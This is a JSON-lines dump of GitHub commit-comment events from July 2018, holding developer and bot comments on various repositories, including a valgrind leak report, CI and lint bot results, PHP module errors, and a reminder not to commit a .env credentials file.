{"id":"7954205969","type":"CommitCommentEvent","actor":{"login":"ayushsuhane"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29680714,"position":null,"line":null,"path":null,"commit_id":"6e0ceda1901e1d768ea1ed457370fb5ea1033ca2","created_at":"2018-07-12T06:32:21Z","updated_at":"2018-07-12T06:32:21Z","author_association":"NONE","body":"Hi Seb, \r\n\r\nIt seems like you are almost over with the memory error. Are you planning to submit a PR to mdanalysis in near future or do you intend to change the code further? I am asking because I plan to include grid search in selections as well as couple of other functions in MDAnalysis along with tests in the coming month. But the first step would be to get it included in the library along with the documentation. Feel free to tell me if I can be of any help. If required, I will be glad to look into some another aspect of grid search.\r\n\r\nPS. I checked the current code with valgrind ` valgrind --tool=memcheck  --leak-check=full --show-leak-kinds=all --num-callers=30 --suppressions=valgrind-python.supp python trial.py`, where `trial.py` included \r\n\r\n```python\r\nfrom gridlocal import FastNS\r\nimport numpy as np\r\nfrom MDAnalysisTests.datafiles import GRO\r\nimport MDAnalysis as mda\r\n\r\ndef get_coords(box,Npoints):\r\n    return (np.random.uniform(low=0,high=1.0,size=(Npoints,3))*box[:3]).astype(np.float32)\r\n\r\nu = mda.Universe(GRO)\r\ng = FastNS(u)\r\ng.set_coords(get_coords(u.dimensions, len(u.atoms)))\r\ng.set_cutoff(4.)\r\ng.prepare()\r\nresults = g.search(np.array([1.,1.,1.]))\r\nresults.get_indices()\r\n```\r\n\r\nIt seems there are still certain blocks with  memory-leak. I am sure you might be aware of these, but if not, I thought I should let you know.\r\nThis is the output of memcheck through valgrind\r\n\r\n```\r\n LEAK SUMMARY:                                                       \r\n    definitely lost: 164,865 bytes in 92 blocks                      \r\n    indirectly lost: 0 bytes in 0 blocks                             \r\n      possibly lost: 174,195 bytes in 110 blocks                     \r\n    still reachable: 3,014,389 bytes in 5,069 blocks                 \r\n         suppressed: 0 bytes in 0 blocks                             \r\n                                                                     \r\n For counts of detected and suppressed errors, rerun with: -v        \r\n Use --track-origins=yes to see where uninitialised values come from \r\n ERROR SUMMARY: 16635 errors from 309 contexts (suppressed: 0 from 0)\r\n```  "}},"created_at":"2018-07-12T06:32:21Z"}
{"id":"7954208250","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29680719,"position":null,"line":null,"path":null,"commit_id":"8ab41d6d1f1cd1a5cb6b80545e474be6f830519c","created_at":"2018-07-12T06:33:01Z","updated_at":"2018-07-12T06:33:01Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/8ab41d6d1f1cd1a5cb6b80545e474be6f830519c#commitcomment-29679823) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/9bb313a9e2c05597b6c359170edd0d040e91b396/daily_2018_7_12/report.md). cc @ararslan"}},"created_at":"2018-07-12T06:33:01Z"}
{"id":"7954208401","type":"CommitCommentEvent","actor":{"login":"tahiraniazi"},"repo":{"name":"seekme94/openmrs-module-commonlabtest"},"payload":{"comment":{"id":29680720,"position":null,"line":null,"path":null,"commit_id":"b3dc976d7dbe9ea052d07d56c7cef9ed020fad71","created_at":"2018-07-12T06:33:04Z","updated_at":"2018-07-12T06:33:04Z","author_association":"COLLABORATOR","body":"@mahmed14 please correct the getter/setters in the rest of the model classes as well"}},"created_at":"2018-07-12T06:33:04Z"}
{"id":"7954210260","type":"CommitCommentEvent","actor":{"login":"Darshan-Chauhan"},"repo":{"name":"crossroads/api.goodcity"},"payload":{"comment":{"id":29680723,"position":null,"line":null,"path":null,"commit_id":"3dfebe0ac92599cdc54ae5b839327da045b3fcdb","created_at":"2018-07-12T06:33:35Z","updated_at":"2018-07-12T06:33:35Z","author_association":"CONTRIBUTOR","body":"It was staying it queue for way too long and sometimes the message wasn't getting delivered so I changed it to perform_now. \r\nNow that I've changed the `TwilioJob` priority as `high` I'll revert this change.\r\nThanks @steveyken "}},"created_at":"2018-07-12T06:33:35Z"}
{"id":"7954218525","type":"CommitCommentEvent","actor":{"login":"kivikakk"},"repo":{"name":"brson/comrak"},"payload":{"comment":{"id":29680740,"position":null,"line":null,"path":null,"commit_id":"ac3218b3af117fc5a061277015a1d10ca0575044","created_at":"2018-07-12T06:35:59Z","updated_at":"2018-07-12T06:35:59Z","author_association":"NONE","body":"→ https://github.com/kivikakk/comrak/pull/81"}},"created_at":"2018-07-12T06:35:59Z"}
{"id":"7954220597","type":"CommitCommentEvent","actor":{"login":"mahmed14"},"repo":{"name":"seekme94/openmrs-module-commonlabtest"},"payload":{"comment":{"id":29680748,"position":null,"line":null,"path":null,"commit_id":"b3dc976d7dbe9ea052d07d56c7cef9ed020fad71","created_at":"2018-07-12T06:36:30Z","updated_at":"2018-07-12T06:36:30Z","author_association":"COLLABORATOR","body":"sure"}},"created_at":"2018-07-12T06:36:30Z"}
{"id":"7954221180","type":"CommitCommentEvent","actor":{"login":"rang6969"},"repo":{"name":"rang6969/explore"},"payload":{"comment":{"id":29680749,"position":null,"line":null,"path":null,"commit_id":"24357f3eb9d1f5decb616f22653052bfde81a223","created_at":"2018-07-12T06:36:40Z","updated_at":"2018-07-12T06:36:40Z","author_association":"OWNER","body":"Leave"}},"created_at":"2018-07-12T06:36:40Z"}
{"id":"7954227274","type":"CommitCommentEvent","actor":{"login":"SimonVrouwe"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":29680758,"position":null,"line":null,"path":null,"commit_id":"fe405f49beba3686d324aae0e46ec61e77e9621c","created_at":"2018-07-12T06:38:11Z","updated_at":"2018-07-12T06:38:11Z","author_association":"NONE","body":"@cdecker not sure if previous comments where read by any devs (or should I submit new issue?) or that I said something stupid, but here is my [derivation](http://nbviewer.jupyter.org/gist/SimonVrouwe/83ffc8a3421a441b69ad81562c8af537), which hopefully makes it more clear.\r\n\r\nThe current code for ewma is not `poll_seconds` independent and also gives problems when `poll_seconds > 150 / 0.9` resulting in `1-change_rate` becoming negative. \r\n\r\nBut you can have convergence similar to yours, i.e. your formula gives `alpha=0.82` for `poll_seconds=30`, you could change `T=300s` to `T=50s` for 90% convergence after 50s.\r\n\r\nAnd Christian thank you for the code snippet you uploaded! :beer: "}},"created_at":"2018-07-12T06:38:11Z"}
{"id":"7954228577","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29680760,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-12T06:38:31Z","updated_at":"2018-07-12T06:38:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T06:38:31Z"}
{"id":"7954229981","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680763,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-12T06:38:54Z","updated_at":"2018-07-12T06:38:54Z","author_association":"NONE","body":"issue_6736 (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T06:38:54Z"}
{"id":"7954230247","type":"CommitCommentEvent","actor":{"login":"Eiminyang"},"repo":{"name":"consenlabs/token-profile"},"payload":{"comment":{"id":29680765,"position":null,"line":null,"path":null,"commit_id":"ebee3033a4143e954b007792ae992ac386e38026","created_at":"2018-07-12T06:38:59Z","updated_at":"2018-07-12T06:38:59Z","author_association":"NONE","body":"![0x4e27a56b7618024a487d628fcbbef9759ea2540d](https://user-images.githubusercontent.com/39787209/42616532-4d75d318-85e1-11e8-97e4-83958223ecd4.png)\r\n"}},"created_at":"2018-07-12T06:38:59Z"}
{"id":"7954230485","type":"CommitCommentEvent","actor":{"login":"ravirahul66766"},"repo":{"name":"ravirahul66766/resume1"},"payload":{"comment":{"id":29680766,"position":5,"line":6,"path":"index.html","commit_id":"133ade9d429c80a7bac88e256082573c8a33ffce","created_at":"2018-07-12T06:39:04Z","updated_at":"2018-07-12T06:39:04Z","author_association":"OWNER","body":"script added"}},"created_at":"2018-07-12T06:39:04Z"}
{"id":"7954230687","type":"CommitCommentEvent","actor":{"login":"petroseskinder"},"repo":{"name":"jin/examples"},"payload":{"comment":{"id":29680767,"position":null,"line":null,"path":null,"commit_id":"90efb269046b72d4ba31a44ad4c07b5773d55f8b","created_at":"2018-07-12T06:39:08Z","updated_at":"2018-07-12T06:39:08Z","author_association":"NONE","body":"THANK YOU!"}},"created_at":"2018-07-12T06:39:08Z"}
{"id":"7954230736","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29680768,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-12T06:39:09Z","updated_at":"2018-07-12T06:39:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T06:39:09Z"}
{"id":"7954231457","type":"CommitCommentEvent","actor":{"login":"jammmet"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":29680770,"position":null,"line":null,"path":null,"commit_id":"f6e06384f1c5aca396ec65a70ec94837f1c133a8","created_at":"2018-07-12T06:39:20Z","updated_at":"2018-07-12T06:39:20Z","author_association":"NONE","body":"I've compiled this myself using latest trunk and set of packages. @mhei - I did try reordering `.ini` files but to no avail\r\n\r\n`PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqlnd.so' (tried: /usr/lib/php/mysqlnd.so (Error relocating /usr/lib/php/mysqlnd.so: RSA_size: symbol not found), /usr/lib/php/mysqlnd.so.so (Error loading shared library /usr/lib/php/mysqlnd.so.so: No such file or directory)) in Unknown on line 0\r\nPHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/pdo_mysql.so (Error relocating /usr/lib/php/pdo_mysql.so: mysqlnd_reverse_api_register_api: symbol not found), /usr/lib/php/pdo_mysql.so.so (Error loading shared library /usr/lib/php/pdo_mysql.so.so: No such file or directory)) in Unknown on line 0\r\n[PHP Modules]\r\nCore\r\ncurl\r\ndate\r\nfilter\r\nhash\r\niconv\r\njson\r\nlibxml\r\nmbstring\r\nopenssl\r\npcre\r\nPDO\r\nPhar\r\nposix\r\nReflection\r\nsession\r\nshmop\r\nSimpleXML\r\nSPL\r\nstandard\r\nZend OPcache\r\nzip\r\nzlib\r\n\r\n[Zend Modules]\r\nZend OPcache`"}},"created_at":"2018-07-12T06:39:20Z"}
{"id":"7954235862","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"nathanchance/op6"},"payload":{"comment":{"id":29680779,"position":10,"line":10,"path":"drivers/param_read_write/param_read_write.c","commit_id":"50eb30ddaa2da42a24326c75eb0385b8eb079395","created_at":"2018-07-12T06:40:33Z","updated_at":"2018-07-12T06:40:33Z","author_association":"NONE","body":"Does userspace write to this? If not then you can probably make it `0444`."}},"created_at":"2018-07-12T06:40:33Z"}
{"id":"7954237596","type":"CommitCommentEvent","actor":{"login":"ravirahul66766"},"repo":{"name":"ravirahul66766/resume1"},"payload":{"comment":{"id":29680782,"position":6,"line":7,"path":"index.html","commit_id":"133ade9d429c80a7bac88e256082573c8a33ffce","created_at":"2018-07-12T06:41:01Z","updated_at":"2018-07-12T06:41:01Z","author_association":"OWNER","body":"added acript"}},"created_at":"2018-07-12T06:41:01Z"}
{"id":"7954239415","type":"CommitCommentEvent","actor":{"login":"ravirahul66766"},"repo":{"name":"ravirahul66766/resume1"},"payload":{"comment":{"id":29680786,"position":15,"line":16,"path":"index.html","commit_id":"133ade9d429c80a7bac88e256082573c8a33ffce","created_at":"2018-07-12T06:41:31Z","updated_at":"2018-07-12T06:41:31Z","author_association":"OWNER","body":"added script"}},"created_at":"2018-07-12T06:41:31Z"}
{"id":"7954239812","type":"CommitCommentEvent","actor":{"login":"theChaosCoder"},"repo":{"name":"HomeOfVapourSynthEvolution/havsfunc"},"payload":{"comment":{"id":29680787,"position":null,"line":null,"path":null,"commit_id":"d58d68134934dfc49153116c4edc1ab46e333877","created_at":"2018-07-12T06:41:38Z","updated_at":"2018-07-12T06:41:38Z","author_association":"NONE","body":"I don't see how this is better without a range parameter. I use stab() very often and a quick test shows that this *new* stab performs less good."}},"created_at":"2018-07-12T06:41:38Z"}
{"id":"7954241547","type":"CommitCommentEvent","actor":{"login":"cvium"},"repo":{"name":"Flexget/Flexget"},"payload":{"comment":{"id":29680795,"position":null,"line":null,"path":null,"commit_id":"043de1e6b0d0ec4b422f44b2157266171bda7cbe","created_at":"2018-07-12T06:42:07Z","updated_at":"2018-07-12T06:42:07Z","author_association":"MEMBER","body":"Broke how? PTP will temp ban you for a couple of hours if you use an\nexpired session. This fixes that by discarding it after 29ish days iirc\n\nOn Thu, 12 Jul 2018, 06:02 Bakh Inamov, <notifications@github.com> wrote:\n\n> folks, this change broke me... how do i clear the stored cookie / get a\n> new one?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Flexget/Flexget/commit/043de1e6b0d0ec4b422f44b2157266171bda7cbe#commitcomment-29679874>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AApNLka-xMhYJ11E4v7rpAmGdWy4wyECks5uFspRgaJpZM4VMLLy>\n> .\n>\n"}},"created_at":"2018-07-12T06:42:07Z"}
{"id":"7954243166","type":"CommitCommentEvent","actor":{"login":"gtl90"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29680799,"position":1,"line":1,"path":".env","commit_id":"8263d5f2fddb96f3ca963df285c0e4426ee40b77","created_at":"2018-07-12T06:42:34Z","updated_at":"2018-07-12T06:42:34Z","author_association":"COLLABORATOR","body":"Thanks Ivo.\n\nKind regards\n\nGeorgina\n________________________________\nFrom: Ivo Ulrich <notifications@github.com>\nSent: 12 July 2018 05:38:23\nTo: Bahmni/person-management-app\nCc: Georgina Hodgkinson; Mention\nSubject: Re: [Bahmni/person-management-app] added .env variable for url (8263d5f)\n\n\n@edieblu<https://github.com/edieblu> @gtl90<https://github.com/gtl90> this .env file is a personal file that each dev will create for themselves and put their credentials inside. Therefore this should not be shared. Please remove/ignore the file in git as described here https://help.github.com/articles/ignoring-files/\n\nhere is a repo with common gitignores you might take inspiration from or maybe there is one that fits https://github.com/github/gitignore\n\nalso you commited .DS_Store which is great to ignore as well\n\nAnd describe in the readme what someone new to the project needs to do to start the app :)\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/Bahmni/person-management-app/commit/8263d5f2fddb96f3ca963df285c0e4426ee40b77#commitcomment-29680376>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ALLnVdN5qGCsX9vg6xA1LKmA6Mil-6xiks5uFuDPgaJpZM4VMPE8>.\n"}},"created_at":"2018-07-12T06:42:34Z"}
{"id":"7954244105","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"phobal/ivideo"},"payload":{"comment":{"id":29680802,"position":83,"line":142,"path":"package.json","commit_id":"177b3a3644298f45fce35c82b60b69dff609c023","created_at":"2018-07-12T06:42:51Z","updated_at":"2018-07-12T06:42:51Z","author_association":"NONE","body":"\t\t+    \"detect-port\": \"^1.2.2\","}},"created_at":"2018-07-12T06:42:51Z"}
{"id":"7954246798","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"phobal/ivideo"},"payload":{"comment":{"id":29680807,"position":1,"line":1,"path":"app/main.dev.js","commit_id":"177b3a3644298f45fce35c82b60b69dff609c023","created_at":"2018-07-12T06:43:36Z","updated_at":"2018-07-12T06:43:36Z","author_association":"NONE","body":"1"}},"created_at":"2018-07-12T06:43:36Z"}
{"id":"7954251318","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"phobal/ivideo"},"payload":{"comment":{"id":29680815,"position":null,"line":null,"path":null,"commit_id":"2d495a9773afbb349693d9d955468a914a62137d","created_at":"2018-07-12T06:44:50Z","updated_at":"2018-07-12T06:44:50Z","author_association":"NONE","body":"2d495a9"}},"created_at":"2018-07-12T06:44:50Z"}
{"id":"7954252331","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"phobal/ivideo"},"payload":{"comment":{"id":29680817,"position":23,"line":9,"path":".eslintrc","commit_id":"2d495a9773afbb349693d9d955468a914a62137d","created_at":"2018-07-12T06:45:07Z","updated_at":"2018-07-12T06:45:07Z","author_association":"NONE","body":"2d495a9"}},"created_at":"2018-07-12T06:45:07Z"}
{"id":"7954259990","type":"CommitCommentEvent","actor":{"login":"nehaljwani"},"repo":{"name":"matplotlib/jupyter-matplotlib"},"payload":{"comment":{"id":29680827,"position":15,"line":15,"path":"ipympl/__init__.py.orig","commit_id":"157c97deddb2a76ae780bd26197fc13da00d4e13","created_at":"2018-07-12T06:47:15Z","updated_at":"2018-07-12T06:47:15Z","author_association":"NONE","body":"Whoops!"}},"created_at":"2018-07-12T06:47:15Z"}
{"id":"7954260141","type":"CommitCommentEvent","actor":{"login":"Charlie12138"},"repo":{"name":"2018TopViewBack-end/DailyNotebooks"},"payload":{"comment":{"id":29680828,"position":null,"line":null,"path":null,"commit_id":"8c57e9d98698eb9ba8e3c420e4b8e67c73b52771","created_at":"2018-07-12T06:47:17Z","updated_at":"2018-07-12T06:47:17Z","author_association":"CONTRIBUTOR","body":"liqinglin"}},"created_at":"2018-07-12T06:47:17Z"}
{"id":"7954260358","type":"CommitCommentEvent","actor":{"login":"chen-zhicong"},"repo":{"name":"chen-zhicong/myProject-01"},"payload":{"comment":{"id":29680829,"position":null,"line":null,"path":null,"commit_id":"483251c3f400e6b10bc545915d00804a6de6fb70","created_at":"2018-07-12T06:47:21Z","updated_at":"2018-07-12T06:47:21Z","author_association":"OWNER","body":"小直播DEMO"}},"created_at":"2018-07-12T06:47:21Z"}
{"id":"7954260463","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29680830,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"dfe8c5c34f4ef41da17a87aea95709080ec581e5","created_at":"2018-07-12T06:47:23Z","updated_at":"2018-07-12T06:47:23Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/wolfram (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/wolfram\" in any of:"}},"created_at":"2018-07-12T06:47:23Z"}
{"id":"7954260476","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29680831,"position":9,"line":null,"path":"pkg/command/wolfram/wolframalpha.go","commit_id":"dfe8c5c34f4ef41da17a87aea95709080ec581e5","created_at":"2018-07-12T06:47:23Z","updated_at":"2018-07-12T06:47:23Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-12T06:47:23Z"}
{"id":"7954260492","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29680832,"position":9,"line":null,"path":"pkg/command/wolfram/wolframalpha.go","commit_id":"dfe8c5c34f4ef41da17a87aea95709080ec581e5","created_at":"2018-07-12T06:47:23Z","updated_at":"2018-07-12T06:47:23Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-12T06:47:23Z"}
{"id":"7954260505","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29680833,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"dfe8c5c34f4ef41da17a87aea95709080ec581e5","created_at":"2018-07-12T06:47:24Z","updated_at":"2018-07-12T06:47:24Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/wolfram (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/wolfram\" in any of:"}},"created_at":"2018-07-12T06:47:24Z"}
{"id":"7954260532","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29680834,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"dfe8c5c34f4ef41da17a87aea95709080ec581e5","created_at":"2018-07-12T06:47:24Z","updated_at":"2018-07-12T06:47:24Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/wolfram\" in any of:"}},"created_at":"2018-07-12T06:47:24Z"}
{"id":"7954260551","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29680835,"position":47,"line":null,"path":"pkg/command/wolfram/wolframalpha.go","commit_id":"dfe8c5c34f4ef41da17a87aea95709080ec581e5","created_at":"2018-07-12T06:47:24Z","updated_at":"2018-07-12T06:47:24Z","author_association":"NONE","body":"golint: exported function NewWolframCommand should have comment or be unexported"}},"created_at":"2018-07-12T06:47:24Z"}
{"id":"7954263477","type":"CommitCommentEvent","actor":{"login":"chen-zhicong"},"repo":{"name":"chen-zhicong/myProject-01"},"payload":{"comment":{"id":29680841,"position":1,"line":1,"path":"README.md","commit_id":"483251c3f400e6b10bc545915d00804a6de6fb70","created_at":"2018-07-12T06:48:11Z","updated_at":"2018-07-12T06:48:11Z","author_association":"OWNER","body":"小直播DEMO"}},"created_at":"2018-07-12T06:48:11Z"}
{"id":"7954263591","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29680842,"position":5,"line":5,"path":"lib/bankline_csv_import_file/record.rb","commit_id":"d6a293b530f2354ff31a2b1c21bb0230ebcd6775","created_at":"2018-07-12T06:48:13Z","updated_at":"2018-07-12T06:48:13Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-12T06:48:13Z"}
{"id":"7954266987","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29680851,"position":null,"line":null,"path":null,"commit_id":"4ba4acf895973626944c8eb474d03dae00ecdb39","created_at":"2018-07-12T06:49:06Z","updated_at":"2018-07-12T06:49:06Z","author_association":"OWNER","body":"Note for the second event listener, \r\nIt is okay if you don't return the self.clients.clainm(), however, it is recommended as there may be times where you might run into a problem which would require you to claim the clients . For such future unexpected errors which can sometimes become difficult to debug, prefer adding this statement.\r\nGood use!!!"}},"created_at":"2018-07-12T06:49:06Z"}
{"id":"7954267977","type":"CommitCommentEvent","actor":{"login":"asiagromasia"},"repo":{"name":"asiagromasia/ITC250_branching"},"payload":{"comment":{"id":29680853,"position":null,"line":null,"path":null,"commit_id":"6051e38912480d40f8b523652d2edd562708dc2f","created_at":"2018-07-12T06:49:21Z","updated_at":"2018-07-12T06:49:21Z","author_association":"OWNER","body":"Once upon a time"}},"created_at":"2018-07-12T06:49:21Z"}
{"id":"7954268255","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/traco"},"payload":{"comment":{"id":29680854,"position":null,"line":null,"path":null,"commit_id":"f0632591f26f762f73766999080a793dba98e6b4","created_at":"2018-07-12T06:49:25Z","updated_at":"2018-07-12T06:49:25Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-12T06:49:25Z"}
{"id":"7954269607","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29680863,"position":6,"line":6,"path":"topics/3d/3d.md","commit_id":"6c6508f34230f0ac0d49e847a326429eefbfc030","created_at":"2018-07-12T06:49:47Z","updated_at":"2018-07-12T06:49:47Z","author_association":"NONE","body":"g"}},"created_at":"2018-07-12T06:49:47Z"}
{"id":"7954270815","type":"CommitCommentEvent","actor":{"login":"probonopd"},"repo":{"name":"translated/tav-releases"},"payload":{"comment":{"id":29680866,"position":null,"line":null,"path":null,"commit_id":"7f15d393b6b0310a6b41ef5e3d1687df75fea25e","created_at":"2018-07-12T06:50:06Z","updated_at":"2018-07-12T06:50:06Z","author_association":"NONE","body":"http://www.translated.net/hts/tav/TAV.AppImage results in 404"}},"created_at":"2018-07-12T06:50:06Z"}
{"id":"7954273895","type":"CommitCommentEvent","actor":{"login":"bartavelle"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":29680872,"position":5,"line":102,"path":"src/Puppet/Runner/Preferences.hs","commit_id":"cb3bac7fbfdc4c091b1594f005ac97f07c1574a3","created_at":"2018-07-12T06:50:55Z","updated_at":"2018-07-12T06:50:55Z","author_association":"OWNER","body":"Yup!"}},"created_at":"2018-07-12T06:50:55Z"}
{"id":"7954274545","type":"CommitCommentEvent","actor":{"login":"AL1L"},"repo":{"name":"artex-development/Lukkit"},"payload":{"comment":{"id":29680873,"position":null,"line":null,"path":null,"commit_id":"e3619df965110bc9fa1fcd40efde49623a8c44dc","created_at":"2018-07-12T06:51:06Z","updated_at":"2018-07-12T06:51:06Z","author_association":"MEMBER","body":"I noticed that but didn't care to fix it."}},"created_at":"2018-07-12T06:51:06Z"}
{"id":"7954276699","type":"CommitCommentEvent","actor":{"login":"jammehcow"},"repo":{"name":"artex-development/Lukkit"},"payload":{"comment":{"id":29680876,"position":null,"line":null,"path":null,"commit_id":"e3619df965110bc9fa1fcd40efde49623a8c44dc","created_at":"2018-07-12T06:51:37Z","updated_at":"2018-07-12T06:51:37Z","author_association":"COLLABORATOR","body":"Merging: want a tutorial?"}},"created_at":"2018-07-12T06:51:37Z"}
{"id":"7954277734","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29680877,"position":null,"line":null,"path":null,"commit_id":"bd760e98af86f541080d49eab1633094e945dec9","created_at":"2018-07-12T06:51:53Z","updated_at":"2018-07-12T06:51:53Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/uploading-favicon-ico/88899/8\n"}},"created_at":"2018-07-12T06:51:53Z"}
{"id":"7954280867","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29680883,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-12T06:52:43Z","updated_at":"2018-07-12T06:52:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T06:52:43Z"}
